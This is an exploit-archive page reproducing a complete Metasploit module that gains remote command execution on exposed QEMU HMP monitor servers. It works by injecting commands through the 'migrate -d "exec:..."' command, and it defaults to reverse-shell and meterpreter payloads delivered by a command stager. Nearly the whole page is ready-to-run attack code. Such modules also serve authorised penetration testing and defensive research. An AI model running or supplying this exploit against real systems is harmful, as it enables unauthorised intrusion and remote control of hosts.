QEMU Monitor HMP migrate Command Execution

2022.02.08

Credit: Brendan Coles

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-78

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "QEMU Monitor HMP 'migrate' Command Execution",
        'Description' => %q{
          This module uses QEMU's Monitor Human Monitor Interface (HMP)
          TCP server to execute system commands using the `migrate` command.

          This module has been tested successfully on QEMU version 6.2.0
          on Ubuntu 20.04.
        },
        'License' => MSF_LICENSE,
        'Author' => ['bcoles'],
        'References' => [
          ['URL', 'https://wiki.qemu.org/ToDo/HMP'],
          ['URL', 'https://www.qemu.org/docs/master/system/monitor.html'],
          ['URL', 'https://www.qemu.org/docs/master/system/security.html'],
          ['URL', 'https://www.linux-kvm.org/page/Migration'],
        ],
        'Arch' => [ ARCH_CMD, ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64 ],
        'Platform' => %w[unix linux],
        'Payload' => {
          'DisableNops' => true,
          'BadChars' => "\x00\x0a\x0d\x22",
          'Space' => 1010
        },
        'Targets' => [
          [
            'Unix (Command)',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
              'Type' => :unix_cmd
            }
          ],
          [
            'Linux (Dropper)',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64 ],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
                'PrependFork' => true,
                'MeterpreterTryToFork' => true
              },
              'Type' => :linux_dropper
            }
          ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        },
        'Privileged' => false,
        'DisclosureDate' => '2011-12-02'
      )
    )
  end

  def read_until_prompt
    ::Timeout.timeout(10) do
      loop do
        res = sock.get_once
        break if res.nil?
        break if res.to_s.include?('(qemu)')
      end
    end
  end

  def check
    connect
    banner = sock.get_once.to_s
    disconnect

    unless banner.include?('QEMU') && banner.include?('monitor')
      return CheckCode::Safe('Service is not QEMU monitor HMP.')
    end

    CheckCode::Appears('QEMU monitor HMP service is running.')
  end

  def execute_command(cmd, _opts = {})
    cmd = cmd.gsub('\\', '\\\\\\')
    vprint_status("Executing command: #{cmd}")
    sock.put("migrate -d \"exec:#{cmd}\"\n")
    read_until_prompt
  end

  def exploit
    connect
    read_until_prompt

    print_status "Sending payload (#{payload.encoded.length} bytes) ..."

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(linemax: 1010, background: true)
    end
  ensure
    disconnect unless sock.nil?
  end
end

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

QEMU Monitor HMP migrate Command Execution

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.